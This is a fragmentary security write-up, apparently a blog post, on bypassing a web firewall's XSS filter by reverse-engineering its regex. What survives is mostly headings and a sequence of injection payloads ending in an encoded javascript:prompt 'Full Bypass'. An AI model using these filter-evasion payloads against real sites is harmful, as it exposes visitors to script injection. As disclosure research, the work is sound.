Introduction

Example #1

As you can see, a completely harmless text triggers an alert, because the regular expression matches anything before and after the "src" attribute.

Example #2

Sucuri XSS Filter

Our CloudProxy firewall does protect your site against XSS script injections if you want to prevent them from ever being used to compromise your site.

Methodology

Initial Tests - Brute Force

Constructing A Bypass - Regex Reversing

"><a href=http://www.google.com>CLICK</a>

"><a/href=http://www.google.com>CLICK</a>

"><a%0c href=http://www.google.com>CLICK</a>


http://www.site.com/shop.php?c=4 "><a fooooooooooooooooooooooooooo href=http://www.google.com>CLICK</a>

"><a fooooooooooooooooooooooooooo href=javascript:alert(1)>CLICK</a>

"><a fooooooooooooooooooooooooooo href=javAsCript:alert(1)>CLICK</a>

"><a fooooooooooooooooooooooooooo href=javAsCript:>CLICK</a>

"><a fooooooooooooooooooooooooooo href=javAsCript:test>CLICK</a>

Full Bypass

><a fooooooooooooooooooooooooooooooooo href=JaVAScript%26colon%3Bprompt%26lpar%3B1%26rpar%3B%>

Ethical Considerations

In Closing

@mmrupp

Unavoidable User Interaction